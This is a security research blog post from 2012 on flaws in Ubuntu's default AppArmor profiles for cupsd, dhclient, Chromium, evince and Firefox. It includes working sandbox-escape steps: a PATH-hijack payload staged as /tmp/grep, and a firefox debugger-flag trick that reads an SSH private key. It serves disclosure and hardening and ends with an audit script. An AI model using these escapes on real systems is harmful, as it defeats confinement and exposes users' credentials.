Poking Holes in AppArmor Profiles
posted by Dan Rosenberg @ 9/04/2012 08:57:00 AM  

Hi, Dan here. In an act of blog necromancy, and in keeping with the "sandboxing" theme of previous posts, in this post I'll be discussing some issues I recently discovered in a variety of AppArmor profiles.

Introduction to AppArmor

AppArmor is a path-based Mandatory Access Control (MAC) system implemented as a Linux Security Module (LSM) that allows administrators to define per-application profiles that restrict access to system resources. It's designed to be a "build-your-own-sandbox" solution with a policy language that is both flexible and easy to audit. AppArmor is part of the mainline Linux kernel, and both SUSE and Ubuntu (and their variants) enable profiles for several perceived high-risk binaries, including both services and client applications.
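
For readers who want to poke at this on their own systems, the profiles currently loaded (and whether they're in enforce or complain mode) can be listed directly. A quick check might look like this, assuming the AppArmor userspace tools are installed and that profiles live under Ubuntu's default /etc/apparmor.d:

$ sudo aa-status
$ ls /etc/apparmor.d/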

In practice, AppArmor suffers from the same weaknesses that plague other similar MAC systems. First, AppArmor does very little to reduce the attack surface of the kernel itself. As a result, it only takes one kernel vulnerability to break out of an AppArmor sandbox entirely. For other solutions that do better in this area, I'd recommend checking out grsecurity or Will Drewry's SECCOMP filter sandboxing, both of which significantly reduce kernel attack surface.

The second consideration that affects AppArmor is that an application's sandbox is only as strong as the policy defining it. Any errors or oversights in a policy definition could lead to incomplete coverage, or worse, render the sandbox completely ineffective.

Keeping this in mind, I audited several of the profiles installed by default on Ubuntu. I was surprised to find that many of these profiles contained fairly basic errors, rendering them essentially useless in the event of a compromise. For our threat model, we'll assume an attacker has achieved arbitrary code execution in the context of an application sandboxed with an AppArmor profile, and we'll see if it's possible to escape the confines of that profile.

Interested readers can consult AppArmor's documentation for the full details of its profile language. For the purposes of this blog post, it's sufficient to understand how AppArmor handles allowing execution of external binaries. There are four rule types that may be set for execution: inherited execution ("ix"), profile execution ("px"/"Px"), unconfined execution ("ux"/"Ux"), and child execution ("cx"/"Cx"). Rules are written in the following syntax:

/path/to/file accesstype,

Binaries for which inherited execution is permitted may be executed by the sandboxed process and run within the confines of the current profile. As a result, ix rules are uninteresting for the purposes of auditing profiles, since they only allow us to execute additional code in the same sandbox, and we're assuming we already have the ability to execute arbitrary code within the context of our compromised application. However, the remaining execution permission types are more interesting.
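
For illustration only, hypothetical rules using each execution type might look like the following. The paths and the child profile name are made up; note that the capitalized variants (such as "Px" and "Ux") additionally scrub the child's environment on exec, while the lowercase ones do not:

# run the target under the current profile (inherited execution)
/usr/bin/helper ix,
# transition to the target's own previously loaded profile
/usr/sbin/some-daemon Px,
# run the target completely unconfined
/usr/local/bin/legacy-tool Ux,
# transition to a child profile named "tool_child" defined within this profile
/usr/bin/some-tool Cx -> tool_child,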

Unconfined Execution Rules

The most obvious places to look for flaws are situations where applications are granted the ability to execute unconfined by AppArmor ("Ux" rules). If we can somehow hijack control of an unconfined child process, that would allow us to break out of an application's sandbox entirely.

AppArmor takes a few steps to prevent this sort of hijacking. When a confined process executes an external application, security hooks in the kernel are invoked to evaluate whether the execution should be permitted based on the current profile. In the case of an allowed application with a Ux rule, the kernel sets the AT_SECURE entry in the auxiliary vector passed to the new process. This causes the linker (ld.so) to sanitize many dangerous environment variables, including LD_PRELOAD and LD_LIBRARY_PATH. This is necessary; otherwise, it would be possible to use these environment variables to force any unconfined child process to load a malicious library and run the attacker's code unconfined.

However, one crucial environment variable isn't included in the linker's list of unsafe environment variables: PATH. As a result, any shell script that doesn't explicitly set PATH or provide full paths for all of its commands is inherently unsafe to allow under a Ux rule.

An attacker running code within the confines of an AppArmor profile may write a payload to some writable location, giving it the name of a command invoked by the target script, set PATH to that directory, and then invoke a shell script that has been allowed unconfined execution, at which point the payload will be executed unconfined. Looking at the profiles shipped by default on Ubuntu, three profiles fall victim to this mistake.

First, the profile for cupsd contains the following rule in /etc/apparmor.d/usr.sbin.cupsd:

/usr/lib/cups/filter/** Uxr,

Among the executables in this directory are several shell scripts:

$ for f in `ls /usr/lib/cups/filter/*`; do file $f | grep shell; done
/usr/lib/cups/filter/gstopxl: POSIX shell script, ASCII text executable, with very long lines
/usr/lib/cups/filter/imagetops: POSIX shell script, ASCII text executable
/usr/lib/cups/filter/pstopdf: POSIX shell script, ASCII text executable
/usr/lib/cups/filter/textonly: Bourne-Again shell script, ASCII text executable
/usr/lib/cups/filter/texttops: POSIX shell script, ASCII text executable

Taking a quick look at the first of these shell scripts, we can identify that gstopxl invokes "grep" without a full path:

# Determine the PCL XL/PCL 6 driver to use...
if test "x$PPD" != x; then
  colordevice=`grep '^*ColorDevice:' "$PPD" | awk -F: '{print $2}'`

As a result, when running code within the CUPS AppArmor profile, it is possible to execute arbitrary code unconfined by the profile by placing a payload at /tmp/grep, setting PATH to /tmp, setting the PPD environment variable to some arbitrary value, and executing the gstopxl script. Game over.
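
Concretely, a minimal sketch of this attack from code already confined by the cupsd profile might look like the following. The payload body, the /tmp location, and the trailing filter arguments are placeholders (CUPS filters conventionally take job-id, user, title, copies, options, and an optional input file); the key points are simply that PATH survives the Uxr transition and that PPD is non-empty:

# stage a fake "grep" in an attacker-writable directory
cat > /tmp/grep <<'EOF'
#!/bin/sh
# attacker payload: executes unconfined once gstopxl calls "grep"
id > /tmp/unconfined-proof 2>&1
EOF
chmod +x /tmp/grep

# PPD only needs to be non-empty to reach the vulnerable grep invocation
PATH=/tmp:$PATH PPD=/dev/null /usr/lib/cups/filter/gstopxl 1 user job 1 '' /dev/null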

Nearly identical issues also affect the profiles for dhclient and Chromium. For dhclient, the following Ux rule for a shell script exists in /etc/apparmor.d/sbin.dhclient:

/etc/dhcp/dhclient-script Uxr,

Sure enough, it is trivial to use PATH to hijack execution of this script as well (try hijacking "ip", for example). Finally, the following rule exists in Chromium's profile at /etc/apparmor.d/usr.bin.chromium-browser:

/usr/bin/xdg-settings Ux,

The same PATH tricks can be used here as well, for example with "cat".

Ubuntu's Sanitized Helper

So far we've managed to achieve completely unconfined code execution from within the AppArmor profiles for Chromium, dhclient, and CUPS. In other profiles, there are no Ux rules, but we can settle for the next best thing.

Ubuntu implements a profile known as "sanitized_helper" that's widely used in place of Ux rules. This profile was introduced when it became clear that allowing any GTK application to run unconfined was unsafe, because an attacker could provide a number of environment variables or arguments, including GTK_MODULES, that would cause the unconfined child to load attacker-supplied code. The sanitized helper is designed to be nearly equivalent to running completely unconfined: applications using this profile may execute code in /bin, /usr/bin, /sbin, and /usr/sbin, initiate arbitrary network connections, and read and write anywhere allowed by standard DAC file permissions on the system.

From the perspective of an attacker, transitioning from a more restrictive profile to the sanitized helper would be a nearly total victory. The restriction of code execution to these system directories provides minimal inconvenience in our threat model, where an attacker is already executing arbitrary code in the context of a compromised application (except perhaps to limit access to the rare setuid binary that lives outside of these directories). I would argue that being able to read and write every file accessible to the compromised user and make network connections freely is functionally equivalent to not being confined at all.

Transitions to the sanitized helper are implemented using the Cx (child execution) rule. Not surprisingly, several profiles allow transitions to the sanitized helper profile for shell scripts, resulting in the same problems as we saw with Ux shell scripts. For example, the evince profile (at /etc/apparmor.d/usr.bin.evince) includes the following abstraction:

#include <abstractions/ubuntu-browsers>

This results in the inclusion of the following policy rules:

/usr/bin/chromium-browser Cx -> sanitized_helper,
/usr/lib/chromium-browser/chromium-browser Cx -> sanitized_helper,

# this should cover all firefox browsers and versions (including shiretoko
# and abrowser)
/usr/bin/firefox Cxr -> sanitized_helper,
/usr/lib/firefox*/firefox*.sh Cx -> sanitized_helper,

All of these are shell scripts. By manipulating the execution of these scripts, we can go from being confined within the evince profile to the essentially unrestricted sanitized helper profile. Conveniently, manipulation of PATH isn't necessary in this case, since both browsers may be invoked with arguments specifying the path of a supposed debugger to be invoked on startup. This can be demonstrated from a shell executing within the evince profile, which restricts read access to certain sensitive files in the user's home directory:

sh-4.2$ read key < .ssh/id_rsa
sh: .ssh/id_rsa: Permission denied
sh-4.2$ /usr/bin/firefox -g -d /bin/cat -a '.ssh/id_rsa -'
-----BEGIN RSA PRIVATE KEY-----
This is my private key, please don't own me!


Additionally, the Firefox profile (in /etc/apparmor.d/usr.bin.firefox) makes the same mistake by including /etc/apparmor.d/abstractions/ubuntu-browsers.d/ubuntu-integration, which allows the "apport-bug" shell script to transition to the sanitized environment.

One thing to note is that the sanitized helper allows execution of child processes using Pix rules, indicating that execution will transition to another previously defined profile if it exists, falling back to inherited execution otherwise.  From /etc/apparmor.d/abstractions/ubuntu-helpers:


# Allow exec of anything, but under this profile. Allow transition
# to other profiles if they exist.
/bin/* Pixr,
/sbin/* Pixr,
/usr/bin/* Pixr,
/usr/sbin/* Pixr,


As a result, it may be possible to perform an attack where a compromised application transitions to execution within the sanitized helper and subsequently escalates privileges to unconfined execution by hijacking another application with a vulnerable Ux transition.

However, at the time of this writing, a bug in AppArmor actually prevents properly transitioning from the sanitized helper to other existing profiles via the Pix rules, instead always using inherited execution.  Ironically, once this bug is fixed, chaining multiple weaknesses to achieve unconfined code execution will be a possibility.

Final Thoughts

Issues arising from allowing shell scripts to execute unconfined, or in a less restrictive profile, are just the tip of the iceberg with AppArmor. The deeper problem is that none of these external applications were designed to be resilient against a user who can execute them with nearly arbitrary arguments, input, and environment. Outside of sandboxes like AppArmor, there is nothing to be gained by finding a way to execute code in the context of an application that runs at the same privilege level as the user performing the exploitation. However, as soon as these applications are allowed to run with higher privileges under an AppArmor profile, they become candidates for privilege escalation and for escaping the confines of an AppArmor sandbox.

There are a few obvious areas that could use immediate improvement if AppArmor is to provide any real protection. First, transitions to higher-privileged contexts, whether via Ux rules or Ubuntu's sanitized helper, should be minimized in existing profiles. Second, until AppArmor allows filtering environment variables such as PATH with finer granularity, execution of shell scripts at higher privileges should be assumed to be unsafe. Finally, each remaining privileged execution rule should be audited to minimize vectors for executing arbitrary code. While some profiles, such as those for BIND and MySQL, have minimal exemptions and tightly defined rule sets, much work needs to be done to achieve robust confinement of applications with more external dependencies, such as browsers, document viewers, and other client-side applications.
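
As a starting point for that kind of audit, here is a rough sketch that flags unconfined-execution rules whose targets file(1) identifies as shell scripts. It assumes Ubuntu's /etc/apparmor.d layout, the grep pattern is approximate, and globbed targets (such as the cupsd filter rule) still have to be expanded and reviewed by hand:

#!/bin/sh
# Flag Ux/ux execution rules in installed profiles whose targets are shell scripts.
grep -rhE '(U|u)xr?,' /etc/apparmor.d/ | awk '{print $1}' | sort -u |
while read -r target; do
    case "$target" in
        *'*'*)
            # globbed rule: expand and inspect manually
            echo "manual review needed: $target" ;;
        /*)
            file "$target" 2>/dev/null | grep -i 'shell script' ;;
    esac
done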


Comments:

At September 7, 2012 at 9:27 AM, Anonymous said...

Thanks Dan for the review and also for contacting Ubuntu directly. Work to address these issues is being tracked in https://launchpad.net/bugs/1045986 - jdstrand


At January 31, 2014 at 10:31 PM, Anonymous said...

sooooo, it would be wise to remove the "P" and just ix for most parts to avoid sandbox escalation?

